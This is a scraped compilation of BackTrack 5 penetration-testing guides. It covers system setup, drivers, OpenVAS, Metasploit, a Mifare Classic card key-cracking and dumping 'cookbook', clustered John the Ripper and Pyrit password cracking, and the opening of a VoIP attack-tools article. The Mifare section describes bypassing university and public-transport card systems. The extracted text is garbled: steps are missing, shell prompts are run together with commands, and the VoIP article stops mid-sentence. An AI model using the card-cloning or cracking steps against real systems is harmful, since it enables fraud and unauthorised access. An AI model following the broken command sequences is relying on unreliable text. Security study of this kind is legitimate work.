Академический Документы
Профессиональный Документы
Культура Документы
Once the installation of BackTrack is done, the default username and password required to log in are root / toor. NOTE: You will not be able to see the password as you type it.
X wont start!
In rare occasions (such as after a VMware tools install, or when using unsupported Video cards), X will refuse to start. If that happens you have several options you can try in order to fix the issue:
Reconfiguring the X server package, you can reset (and often fix) Xorg configurations with the following command:
root@bt:~# dpkg-reconfigure xserver-xorg
If you are using Backtrack 5 on x64 with KDE you should try the following:
root@bt:~# rm /root/.kde/cache-*
NOTE: Sometimes you may need to also remove the cache folders in /var/tmp by issuing the following command:
root@bt:~# rm -rf /var/tmp/kdecache-*
DNS server
192.168.1.1
Edit the file as appropriate, then have the network come up automatically at boot time:
root@bt:~# update-rc.d networking defaults root@bt:~# /etc/init.d/networking restart
All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ Listening on LPF/eth0/00:0c:29:81:74:21 Sending on LPF/eth0/00:0c:29:81:74:21 Sending on Socket/fallback DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67 DHCPACK of 192.168.1.112 from 192.168.1.1 bound to 192.168.1.112 -- renewal in 37595 seconds. root@bt:~#
In order to get rid of this error you have to reboot Backtrack, than BEFORE starting WICD open up a terminal and type in the following:
root@bt:~# dpkg-reconfigure wicd root@bt:~# update-rc.d wicd defaults
Starting services
BackTrack has various services such as Apache, SSH, MySQL, VNC, etc. They are all disabled by default. To start a service such as SSH, you can use the service init scripts. For example, to start the SSH service:
root@bt:~# sshd-generate # Specific to the SSH service - needed to generate SSH keys root@bt:~# /etc/init.d/ssh start Starting OpenBSD Secure Shell server: sshd. root@bt:~# /etc/init.d/ssh stop Stopping OpenBSD Secure Shell server: sshd. root@bt:~#
When using a ssh server for the first time on Backtrack you will need to generate keys:
root@bt:~# sshd-generate
To enable a service at boot time, you can use the update-rc.d command, for example, having SSH start at boot time:
root@bt:~# update-rc.d Adding system startup /etc/rc0.d/K20ssh -> /etc/rc1.d/K20ssh -> /etc/rc6.d/K20ssh -> /etc/rc2.d/S20ssh -> /etc/rc3.d/S20ssh -> /etc/rc4.d/S20ssh -> /etc/rc5.d/S20ssh -> root@bt:~# -f ssh defaults for /etc/init.d/ssh ... ../init.d/ssh ../init.d/ssh ../init.d/ssh ../init.d/ssh ../init.d/ssh ../init.d/ssh ../init.d/ssh
dpkg -s <package> Shows information on the installed package <package>. See also aptcache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file. dpkg-reconfigure <package> Reconfigures an installed package man dpkg Will give you more info on these commands as well as many that are in less common usage.
Another very good resource on linux command usage can be found at linuxcommand.org Some programs do not have a man page, but you can usually get more information on it's usage by typing:
root@bt:~# <program name> Just the program name without any arguements.
or
root@bt:~# <program name> -help
or
root@bt:~# <program name> --help
or
root@bt:~# <program name> -h
Some programs use other methods, but they are usually just a variation of one of the above five commands.
Occasionally you might want to compile code that requires kernel headers (such as compatwireless, or other drivers). These are quick instructions on how to do so.
root@bt:~# prepare-kernel-sources root@bt:~# cd /usr/src/linux root@bt:~# cp -rf include/generated/* include/linux/
NOTE: You need to be connected to the internet in order to download the linux-source package.
In this tutorial we will proceed to enable PAE on Backtrack5 R2. We first prepare our kernel and enter the kernel menuconfig.
root@bt:~# prepare-kernel-sources root@bt:/usr/src/linux# zcat /proc/config.gz > .config root@bt:/usr/src/linux# make menuconfig
After we have launched the ncurses menuconfig we proceed in enabling PAE which can be found at the following: Processor type and features -> High Memory Support(4) -> 64GB
Once we have enabled PAE from the menuconfig we proceed into building our kernel.
make scripts make prepare make update-initramfs -u
NOTE: Changing additional options in the ncurses config without knowing what the options do might break your kernel!
root@bt:~# apt-get dist-upgrade root@bt:~# prepare-kernel-sources root@bt:/usr/src/linux# zcat /proc/config.gz > .config root@bt:/usr/src/linux# make menuconfig
Configure your kernel to use b43 instead of the default brcmsmac drivers by selecting the BCMA support option. To get to this option, navigate to :
Add the BCMA support as a module, and "Support for BCMA on PCI-host bus" as shown below
Exit the ncurses menu config, and build your kernel package:
make prepare make make modules_install make install update-initramfs -u update-grub2
Install Java
This article was contributed by g0tmi1k.
Twitter: https://twitter.com/#!/g0tmi1k
Downloading Java.
root@bt:~# mkdir -p /opt/java && cd /opt/java root@bt:~# chmod +x /tmp/java.bin && /tmp/java.bin
Final changes.
root@bt:~# update-alternatives --install /usr/bin/java java /opt/java/jre1.6.?_??/bin/java 1 root@bt:~# update-alternatives --set java /opt/java/jre1.6.?_??/bin/java
root@bt:~# mkdir -p /usr/lib/mozilla/plugins/ root@bt:~# ln -sf /opt/java/jre1.6.?_??/lib/i386/libnpjp2.so /usr/lib/mozilla/plugins/ root@bt:~# export JAVA_HOME=/opt/java/jre1.6.?_??/bin/java
First we need to install the flux-for-back package which will grab everything we need in order to get FluxBox running.
root@bt:~# apt-get install flux-for-back
After the script is installed we will see that it automatically starts to setup FluxBox.
Once the script is finished you will be presented with a message which tells you to start your FluxBox.
However before we restart there is one thing that we have to do, we will have to make tell BackTrack to run FluxBox on the startx command and not it's default WM.
NOTE: In order to revert back to the default WM all you have to do is delete the .xinitrc file.
root@bt:~# rm -rf ~/.xinitrc root@bt:~# shutdown -r 0
As you may have noticed Flash Player does not work on Backtrack 5, so in order to fix this we first need to remove the current flash player by issuing the following commands:
root@bt:~# apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla root@bt:~# rm -f /usr/lib/firefox/plugins/*flash* root@bt:~# rm -f /usr/lib/firefox-addons/plugins/*flash* root@bt:~# rm -f /usr/lib/mozilla/plugins/*flash* root@bt:~# rm -f ~/.mozilla/plugins/*flash*so root@bt:~# rm -rfd /usr/lib/nspluginwrapper
After removing flash we need to get the new flash player from the official website: 1. Flash x64 ONLY FOR x64. 2. Flash Player Download the .tar.gz file.
We will begin with Flash Square, SKIP THIS if you aren't using an x64 version of BackTrack.
root@bt:~# tar xvfz flashplayer10_2_p3_64bit_linux_111710.tar.gz root@bt:~# chown root:root libflashplayer.so root@bt:~# chmod 644 libflashplayer.so root@bt:~# cp -f libflashplayer.so /usr/lib/mozilla/plugins/ root@bt:~# rm -rf libflashplayer.so root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/
root@bt:~# tar xvfz install_flash_player_10_linux.tar.gz root@bt:~# mkdir ~/.mozilla/plugins root@bt:~# mv -f libflashplayer.so ~/.mozilla/plugins/ root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefoxaddons/plugins/ root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/xulrunner-addons/plugins/
Twitter: https://twitter.com/#!/g0tmi1k
NOTE: You might need to make some minor tweaks depending on your system. Let's begin:
First of all before we start we want to make sure that our system is up to date.
Before we go on with installing the ATI drivers we need to get our kernel source prepared.
Now that we are set up it's time to download the ATI drivers.
root@bt:~# wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-9x86.x86_64.run root@bt:~# chmod +x ati-driver-installer-11-9-x86.x86_64.run root@bt:~# ./ati-driver-installer-11-9-x86.x86_64.run root@bt:~# reboot
Before we are finished there is one more thing that we need to install, The AMD Accelerated Parallel Processing (APP) SDK, this one needs to be installed according to your CPU architecture.
We will also need cmake and cmake++ along with some other library files.
Before we can install cmake++ we need to set the ATI Stream paths:
root@bt:~# echo "ATISTREAMSDKROOT=/opt/AMDAPP root@bt:~# export ATISTREAMSDKROOT" >> ~/.bashrc root@bt:~# source ~/.bashrc
root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ /tmp/pyrit root@bt:~# cd /tmp/pyrit/pyrit && python setup.py build && python setup.py install root@bt:~# cd /tmp/pyrit/cpyrit_opencl && python setup.py build && python setup.py install
Let's quickly configure autoscan in Backtrack5, you can find it using the menu in:
BackTrack -> Information Gathering -> Network Analysis -> Network Scanners -> autoscan
As soon as we launch it from the menu we will begin our configuration wizard, click on Forward to move on:
Now we are going to configure a new Network and add our own data by clicking the Add button:
Here is some output similar to what you will see on some devices:
Unicornscan is an awesome "payload sender" which can also act as an asynchronous scanner. Thanks to dash1b and his awesome patch-up script, we were able to quickly implement the full features of the scanner in BackTrack 5. To install unicornscan on BackTrack 5 (if not already installed), type:
root@bt:~# apt-get update root@bt:~# apt-get install unicornscan
Next, run the postgres-setup script, which was taken mostly from http://code.google.com/p/unicornscan-bt5-install-script/. This script will setup the Framework3 PostgreSQL server as the DB back-end for Unicornscan.
Start apache, and browse to http://127.0.0.1/unicornscan. Initiate a scan using the epgsqldb option.
Installing OpenVAS
The simplest way of installing all of required parts of the openvas suite is to issue the following commands in a terminal window.
root@bt:~#apt-get update root@bt:~#apt-get install openvas
The package openvas is a "master" package that holds all of the info required to automatically download all of the other packages that make up the full openvas suite of tools.
Setting up OpenVAS
Step 1. Adding a user
From the menu, select Openvas Adduser and follow instructions.
Note that you can use any username you like but in this case I have just used root. I have left it at the default of password authentication as I am going to be using this on a local machine and to save having to worry about the users having certs to worry about, but this is entirely up to you. You cannot have an empty password so I have used toor in this case. For the rules applied to this user I have left them blank by pressing ctrl-d This means that this user will be able to perform any tasks without any restrictions.
At this point we need to get the latest set of nvt's. These are what the scanner uses to detect the vulnerabilities in what you are scanning. Please note you will need to do this quite regularly, and the first time you do it could take a while depending on the speed of your computer and internet. So select OpenVAS NVT Sync from the menu
Note the time in the corner ! This was in a VM so it should be much quicker for you. Subsequent starts will be quick unless you have not updated in quite some time Please remember that the scanner runs as a daemon in the background and will keep running until you reboot or stop it with the menu entry provided.
now we need to rebuild the database as it is now out of date with the added nvt's and we would otherwise get errors about the database. You should do this each time you update the NVT's. This is done with a simple command
openvasmd --rebuild
This process will only take a few seconds if using openvas-libraries version 4.0.3 or below. This process can take much longer if using openvas-libraries version 4.0.5 or above. The tradeoff for this extra time is much greater scanning capabilities, so it is worth it.
openvasadmin is the username I have chosen to become this user, you however can substitute that with something better suited to you if you so choose. Make sure you can remember this username and associated password as you WILL need it when running openvas.
root@bt:~# openvasad -c 'add_user' -n openvasadmin -r Admin Enter password: ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file provided, the new user will have no restrictions. ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin has been successfully created. root@bt:~#
More info on the above commands and other options can be found by running their associated menu entry and by looking at the man pages. As all three of these run as a daemon and will continue running until you shutdown you computer, I have provided menu entries for you so as you can stop them when you no longer need them.
At this point your installation is essentially complete, but as we have got this far we may as well continue to make sure everything is working as expected.
Once logged in you can use this as your scanning interface, or use the next choice of you prefer.
Web interface
This next method is via a web interface Open your favorite browser and enter the following address 127.0.0.1:9392 You will then be presented with a login page. login with the credentials we created earlier.
Once you have logged in, you will notice that your CPU usage will hit the roof, don't worry, this will return to normal in short while.
Here you can perform and setup all of your scanning tasks. It is a good idea to set NoScript to Temporarily allow 127.0.0.1 or you may get unexpected results. There is much more to OpenVAS than I have included here, but this is only intended to get you up and running quickly. Scans and more advanced setups are beyond the scope of this simple tutorial. Don't forget about some of the other parts to openvas contained within the menu that I have not covered here and also the man pages.
Then from the menu Start Greenbone Security Desktop and login You are now ready to setup your scanning tasks.
Metasploit Framework with MySQL Support With a recent bugfix, we have simplified the steps required to use MySQL as a back-end to the Metasploit Framework.
root@bt:~# root@bt:~# root@bt:~# root@bt:~# apt-get update apt-get dist-upgrade service mysql start msfconsole
msf > Go ahead and connect to the database using the default MySQL root password toor:
msf [*] msf msf >db_driver mysql Using database driver mysql > db_connect root:toor@127.0.0.1/msf3 >
BackTrack 5 r2
BackTrack 5 R2 contains patched stock kernel 3.2.6 wireless drivers with several injection patches applied.
b43
BackTrack 5 R2 has switched from b43 drivers to brcmsmac drivers. If you need to enable the b43 drivers, follow this howto - http://www.backtracklinux.org/wiki/index.php?title=Enable_b43_drivers_in_Backtrack5_r2.
BackTrack 5 r1
BackTrack 5 R1 contains patched stock kernel 2.6.39.4 wireless drivers with several injection patches applied. Depending on card and setup, these drivers might not suit you.
rt2800usb
In some cases we've seen cards using the rt2800usb drivers (such as the AWUS036NH and AWUS036NEH ALFAs) act strange with the BT5R1 kernel. If this happens to you, you can try installing a recent compat-wireless and building it on your own. This specific version will work:
root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build root@bt:~# cd/usr/src/ root@bt:~# wget http://linuxwireless.org/download/compat-wireless-2.6/compatwireless-2011-07-14.tar.bz2 root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2 root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar root@bt:~# tar xpf 2.6.39.patches.tar root@bt:~# cd compat-wireless-2011-07-14 root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retrycount.patch root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch root@bt:~# make root@bt:~# make install root@bt:~# reboot
BackTrack 5
BackTrack 5 contains patched stock kernel 2.6.38 wireless drivers, as well as several "external" drivers. Some of these drivers overlap, to provide maximum flexibility with various wireless attacks. The /etc/modprobe.d/blacklist dictates which preferred drivers are loaded
at boot-time. Generally speaking, all the older IEEE drivers are blacklisted and need to be loaded manually if you want to use them.
Wireless Drivers
rtl8187 vs r8187
This is a confusing one. The rtl8187 is the mac80211 stack driver, while the r8187 is the old IEEE driver. Both support injection. The newer mac80211 rtl8187 drivers seem to have a nasty bug in VMWare. For more information about these drivers check our rtl8187 vs r8187 page.
compat wireless
As Linux wireless drivers mature, more chipsets get added to the compatibility list. If none of the native BackTrack kernel drivers work for you, you might want to consider using a more recent version of compat-wireless. Check out the compat-wireless page for information on how to get those drivers up and running.
Wireless Cards
THIS LIST NEEDS TO BE UPDATED FOR BT5.
AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed Rockland N3 - (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers -passed Edimax EW-7318USG USB - (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers -passed ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers passed Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers -passed Ubiquiti SRC - using the mac80211 ath9k drivers-passed Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers-passed
Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers-passed Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k drivers-passed Netgear wg111v2 - using the mac80211 rtl8187 drivers-passed ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed Intel 4956/5xxx - using the iwlagn drivers - passed
Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03) Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)
D-Link DWL-122 - using the mac80211 prism2_usb drivers - fail Linksys WUSB600N v2 - using the mac80211 rt2800usb drivers - fail AWUS051NH - fail
For informational use only as part of academic or research study, especially in the field of informational security, cryptography and secure systems
As-is without any warranty, support or liability - any damages or consequences obtained as a result of consulting this information if purely on the side of the reader NOT to be used in illegal circumstances (for example to abuse, hack or trick a system which the reader does not have specific authorizations to such as ticketing systems, public transport, University/ISIC cards, building access systems or whatsoever systems using Mifare Classic as core technology)
NOTES:
This article contain no original research. All the research and implementation was made by other people and communities and is publicly available. We made this two cents just for fun and because we love BackTrack. This is not A-Z guide so try harder!
0x00 - Preface
Some of you may have read that the proprietary symmetric key cryptographic algorithm of the MIFARE Classic card has been broken. The MIFARE Classic card is used in physical access control systems (PACS) and contact less payment systems (including tollway and public transportation systems). By some estimates, there are 500 million MIFARE cards deployed worldwide, and the majority of them are MIFARE Classic cards.
Mifare Classic is a inexpensive, entry-level chip, based on ISO/IEC 14443 Type A, 1kB or 4kB. Uses 13.56 Mhz contactless smartcard standard, proprietary CRYPTO1 with 48 bits keys. There is no protection against cloning or modifications. Anyone with 50 reader can use this weakness against your infrastructure. At least one sector is always encrypted with default key. After cracking all keys, hackers are able to change name, students university number, expiration date... This cookbook is proof of concept how easy that can be done. Chosen ingredients: Backtrack | Touchatag starter package Tested on: BackTrack 4 R2, BackTrack 5 Final, (32bit)
Dependencies
0x01 - Hardware
Touchatag - ACR122U
Touchatag is ACS ACR122(U) NFC Reader USB RFID reader. The USB reader works at 13.56MHz (High Frequency RFID) and has a readout distance of about 4 cm (1 inch) when used with the Touchatag RFID tags. This product is made by Advanced Card Systems Limited and seems to be available in different layouts but hardware doesn't differ so much. They are all using a PN532 NFC Controller chip and a ST7 microcontroler unit.
0x02 - Software
ACR122U driver
root@bt:~# wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root@bt:~# unzip -d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root@bt:~# cd acr122u root@bt:~# tar -jxvf acsccid-1.0.2.tar.bz2 root@bt:~# cd acsccid-1.0.2 root@bt:~# ./configure root@bt:~# make root@bt:~# checkinstall -D -y --install
If your reader is rejected because of the firmware (log message: Firmware (x.y) is bogus!) just disable version checking. All you need to do is change ifdDriverOptions (line 55 in Info.plist) to skip version checking like this:
root@bt:~# nano /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/Info.plist ifdDriverOptions 00005
Afterwards, restart the pcscd daemon and your Touchatag reader should be recognized and ready.
You can also use the -k key parameter, to add a key to the list of known keys, which is being tried against your card in the initial phase. The -k option somehow didn't work for me, so I always compile my known keys directly into mfoc.c Search for Array with default Mifare Classic keys Not sure about other countries, but in country where I live keys are the same. Once you have keys from all sectors, you should be able to use RFID-Fu against other cards, which is epic fail.
root@bt:~# nfc-mfclassic --help Usage: nfc-mfclassic r|w a|b <dump.mfd> [<keys.mfd>] r|w - Perform read from (r) or write to (w) card a|b - Use A or B keys for action <dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card) <keys.mfd> - MiFare Dump (MFD) that contain the keys (optional)
Or: nfc-mfclassic x <dump.mfd> <payload.bin> x - Extract payload (data blocks) from MFD <dump.mfd> - MiFare Dump (MFD) that contains wanted payload <payload.bin> - Binary file where payload will be extracted
Keep in mind that card UID will be not affected (not changed) with this process. Buy some blank card or Proxmark III if that is what you want. If you are now thinking about dumping your electronic wallet right after recharge and when credit comes to zero, writing content back, then please don't do it. What can stop you from doing that? Well, probably only your conscience, but if the card gets blocked in 24 hours after first use then don't complain. Yes, there are online checking and billing systems out there for basic cards.
At some universities, there is only one entry security check ISIC. As you can see this is trivial to bypass. We did many tests with public transportation systems and with university systems. Results are all the same those systems are easily hackable.
0x06 Conclusion
Finally, when will people learn their lesson? Cryptographic algorithms should be public so that they can be scrutinized and tested. Secret algorithms arent more valuable because they are secret. Anyone needing a highly secure smart card should make sure there's layered security and not just depend on the chip's encryption.
Since i have access to Proxmark III which is universal RFID hacking tool which can be used for 100% accurate cloning (even UID), i may once write second edition about c00king with Mifare Classic and HID Prox... Arming BackTrack with GSM attack suite?
0x08 Thanks
This cookbook was made with great help from h4f guys, many thanks to Vulcano and Back.
0x0A - About
MI1 is a "full time security enthusiast" with university degree in the field of informatics. Recently focusing his passion to USRP and RFID stuff.
This guide is a work in progress, and is meant to help those needing to get CUDA working on their BackTrack machines. Start by preparing your kernel sources for the Nvidia driver installation:
root@bt:~# prepare-kernel-sources root@bt:~# cd /usr/src/linux root@bt:~# cp -rf include/generated/* include/linux/
Make sure you are not in an X session (log out to console), and run the Nvidia driver installer. Next, download the CUDA toolkit, according to your CPU architecture:
Ideally you should install the CUDA toolkit to /opt. this guide assumes this installation path. Configure your environment variables so that the nvcc command works. You can do this by appending the following lines in your /root/.bashrc file:
Then run:
root@bt:~# source /root/.bashrc root@bt:~# ldconfig
The whole purpose of this was to get nvcc compiler installed. You can check that everything is set up correctly:
root@bt:~# which nvcc /opt/cuda/bin/nvcc root@bt:~# nvcc -V nvcc: NVIDIA (R) Cuda compiler driver Copyright (c) 2005-2011 NVIDIA Corporation Built on Sun_Mar_20_16:45:27_PDT_2011 Cuda compilation tools, release 4.0, V0.2.1221 root@bt:~#
Now that the Nvidia driver and CUDA toolkit are installed, we can test their functionality with a GPU powered tool such as pyrit.
root@bt:~# root@bt:~# root@bt:~# root@bt:~# install svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit cd pyrit/pyrit && python setup.py build && python setup.py install cd ../../ cd pyrit/cpyrit_cuda && python setup.py build && python setup.py
'CUDA-Device #1 'GeForce 'CUDA-Device #2 'GeForce 'CUDA-Device #3 'GeForce 'CUDA-Device #4 'GeForce 'CUDA-Device #5 'GeForce 'CUDA-Device #6 'GeForce 'CPU-Core (SSE2)': 500.7 'CPU-Core (SSE2)': 508.9
GTX 295: 11558.7 GTX 295: 10912.5 GTX 295: 10632.1 GTX 295: 11654.7 GTX 295: 10868.9 GTX 295: 10322.8 PMKs/s (RTT 2.7) PMKs/s (RTT 2.8)
Success! We can now use CUDA powered tools from within BackTrack.
In this tutorial we are going to build a cluster that will aid us in cracking hashes using John the Ripper. The first thing we want to do is install libssl-dev and mpich2 after which we configure it. (Note: secretword must be the same on each machine.)
apt-get install mpich2 libssl-dev touch /etc/mpd.conf chmod 600 /etc/mpd.conf echo "secretword=bt" >> /etc/mpd.conf touch mpd.hosts echo "192.168.1.69:1" >> mpd.hosts chmod 600 mpd.hosts mpdboot mpdtrace mpdallexit
root@bt:~# root@bt:~# root@bt:~# root@bt:~# root@bt:~# root@bt:~# root@bt:~# root@bt:~# root@bt:~# bt root@bt:~#
root@bt:~/Desktop# wget http://www.bindshell.net/tools/johntheripper/john1.7.3.1-all-2-mpi8.tar.gz root@bt:~/Desktop# tar xvfz john-1.7.3.1-all-2-mpi8.tar.gz root@bt:~/Desktop/john-1.7.3.1-all-2-mpi8/src# make clean linux-x86-sse2 root@bt:~# mv -f john-1.7.3.1-all-2-mpi8 /pentest/passwords/john-mpi
After installing the MPI version of John the Ripper we configure our /etc/hosts file.
192.168.1.70
node1
# The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters ff02::3 ip6-allhosts
Once we have the server and the client setup it's time to enable our SSH server and transfer the configuration files from the server to the client.
root@bt:~# ssh root@192.168.1.70 mkdir -p /root/.ssh root@bt:~# cat /root/.ssh/id_rsa.pub | ssh root@192.168.1.70 'cat>>.ssh/authorized_keys' root@bt:~# scp /root/mpd.hosts root@192.168.1.70:/root/ root@bt:~# scp /etc/mpd.conf root@192.168.1.70:/etc/ root@bt:~# scp /etc/hosts root@192.168.1.70:/etc/
root@bt:~# mpdboot -v --file=/root/mpd.hosts -n 2 running mpdallexit on bt LAUNCHED mpd on bt via RUNNING: mpd on bt LAUNCHED mpd on 192.168.1.70 via bt2 RUNNING: mpd on 192.168.1.70
root@bt:~# echo "admin:21232f297a57a5a743894a0e4a801fc3" > /root/test root@bt:~# scp /root/test root@192.168.1.70:/root/ root@bt:~# mpiexec -host 192.168.1.69 -np 2 /pentest/passwords/johnmpi/run/john --format:raw-MD5 /root/test Loaded 1 password hash (Raw MD5 [raw-md5])
admin (admin) admin (admin) thread: 1 guesses: 1 time: 0:00:00:00 100% (1) admins thread: 0 guesses: 1 time: 0:00:00:00 100% (1) admins
In this tutorial we are going to build a cluster on Backtrack5 R2 using Pyrit. Pyrit comes installed by default on Backtrack5 R2. If you have removed it, simply use apt-get install to install it. The first step to creating a pyrit cluster is to create a configuration file.
default_storage = file:// limit_ncpus = 0 rpc_announce = true rpc_announce_broadcast = false rpc_knownclients = 192.168.1.69 (This is the servers IP) rpc_server = true workunit_size = 75000
After having the above configuration file on all our machines, we start the server.
Now from the client you should be able to see both cores.
NOTE: The pyrit list_cores command has a bug that when used will crash the server.
We can test our newly built cluster using pyrit's benchmark option.
If we switch to the server while running the benchmark, we can see that currently one client is connected.
soft phones). Now days there are many vendors for PBX, IP telephones, VoIP services and equipment such as: CISCO, AVAYA and ASTERISK, SNOM, THOMSON With new technology comes a new challenge for both the defensive and offensive side of security, One of the great dangers of traditional phone lines was that it was susceptibl e to eavesdropping. The old school way to eavesdrop on somebodys phone line was to physically connect a small transmitter which was connected inside or outside their premises somewhere along the phone cord.
IP telephony systems are also susceptible to eavesdropping, doing so in an IP environment is a little bit more difficult to execute, detect and require more the knowledge and the right set of tools. In this article we wont discuss a particular vendor or technique but we will take a look at the concepts and the tools available for attacking VoIP available for us in Backtrack Linux. The main goal of this article is to present the tools and their purpose in order to help you choose the right tool for the right situation. We will examine some real world attack vectors and discover how BackTrack can assist us pentesting VoIP; we will also examine some of the tools which present in BackTrack and their usage.
Self Hosted
A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony service provider PSTN via a SIP Trunk/PRI, the VoIP traffic flows through a dedicated Vlan.
Hosted Services
There is no need for a PBX at site. Just a switch, a router, IP phones and a connection to the service provider PBX via internet or IP/VPN connection, each phone is configured with SIP account information.
SIP Basics
The SIP (Session Initiation Protocol) role is to setup, terminate or modify a voice or a video call where the voice and/or video traffic are being carried by a protocol like RTP (Real time transport Protocol). SIP is an application layer protocol which uses UDP for transport (TCP and SCTP can be used as well).
SIP usually uses ports 5060 TCP or UDP for unencrypted signaling or 5061 for encrypted transportation using TLS.
SIP is an ASCII based protocol which has some similar elements like in the HTTP protocol by using a Request/Response model. Much like an HTTP request from a browser a SIP client request is made using a SIP URI a user agent and a method/request. SIP uses e-mail like addresses format: user/phone@domain/ip A typical SIP URI looks like:
sip:205@192.168.1.100, sip:username@pbx.com , sip:205@192.168.1.100:5060
According to the request made by the client a response will be received with a status or error code, the following tables describe the available requests and responses in the SIP protocol.
SIP Responses
Response Description Informational responses, Request received and being 1xx processed. Successful responses The action was successfully received, 2xx understood, and accepted. 3xx Redirection responses Request failure responses The request contains bad syntax or 4xx cannot be fulfilled at the server. Server failure responses The server failed to fulfill an 5xx apparently valid request.
Global failure responses The request cannot be fulfilled at any 6xx server.
SIP/2.0 100 Trying Via: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060 From: "NIghtRanger" ;tag=eihgg To: Call-ID: hfxsabthoymshub@backtrack CSeq: 650 INVITE User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Supported: replaces Contact: Content-Length: 0
The calling phone sends an invite. The called phone sends back a response of 100 (Trying). The called phone then starts to ring and sends a response of 180 (Ringing). When the caller picks up the phone the called phone sends a response of 200 (OK). The calling phone sends an ACK response. Conversation begins via RTP. When the caller hangs up the phone a BYE request is sent. The calling phone responds with 200 (OK).
Attack Vectors
Before we get started with the tools lets have a look at some common VoIP attack vectors:
Information Gathering, Footprinting and Enumeration. Monitoring Traffic and eavesdropping Phone calls. Attacking Authentication.
VLAN Hopping. Denial of Service / Flooding. Spoofing Caller ID. In order to test the tools I have setup a TRIXBOX PBX System and created 6 extensions. I will be using two soft phones, 1 is Linux based client called Twinkle and the 2nd is a Windows based client called X-Lite. I will be using the latest and greatest release of Backtrack Linux which is R2. You can find Most of the VoIP attack tools in Backtrack under the /pentest/voip/ directory:
root@bt:~# cd /pentest/voip/ root@bt:/pentest/voip#
Or you can simply navigate using the KDE menu to the Backtrack Voice Over IP sub menus :
Information Gathering
This phase is where we gather information about the topology, servers and clients to learn as much information as we can in order to launch a successful attack. What we are interested in finding is live hosts, PBX type and version, VoIP servers/gateways, clients (hardware and software) types and versions etc Instead of enumerating usernames we will be enumerating SIP extensions. Lets take a look at some of the tools which available in Backtrack to help us find, identify and enumerate VoIP enabled devices.
SMAP
Backtrack includes a great tool called SMAP which is a simple scanner for SIP enabled devices SMAP sends off various SIP requests awaiting responses from SIP enabled DSL router, proxies and user agents. It could be considered a mash up of NMAP and sipsak.
SMAP Usage:
usage: smap [ Options ] -h: this help -d: increase debugging -o: enable fingerprinting -O: enable more verbose fingerprinting -l: fingerprint learning mode -t: TCP transport -u: UDP transport (default -P0: Treat all hosts as online - skip host discovery -p : destination port -r : messages per second rate limit -D : SIP domain to use without leading sip: -w : timeout in msec
192.168.1.104: ICMP reachable, SIP enabled 1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
192.168.1.20: ICMP reachable, SIP enabled 192.168.1.22: ICMP reachable, SIP enabled 192.168.1.0: ICMP unreachable, SIP disabled 192.168.1.1: ICMP unreachable, SIP disabled 192.168.1.2: ICMP unreachable, SIP disabled 192.168.1.3: ICMP unreachable, SIP disabled ----EDIT--192.168.1.250: ICMP unreachable, SIP disabled 192.168.1.251: ICMP unreachable, SIP disabled 192.168.1.252: ICMP unreachable, SIP disabled 192.168.1.253: ICMP unreachable, SIP disabled 192.168.1.254: ICMP unreachable, SIP disabled 192.168.1.255: ICMP unreachable, SIP disabled 256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)
Now that we have identified sip enabled hosts we can use SMAP to fingerprint the server/client type and version:
192.168.1.104: ICMP reachable, SIP enabled best guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579 User-Agent: Asterisk PBX 1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
In case SMAP could not fingerprint our host we use the l argument to put it in learning mode to provide some useful information:
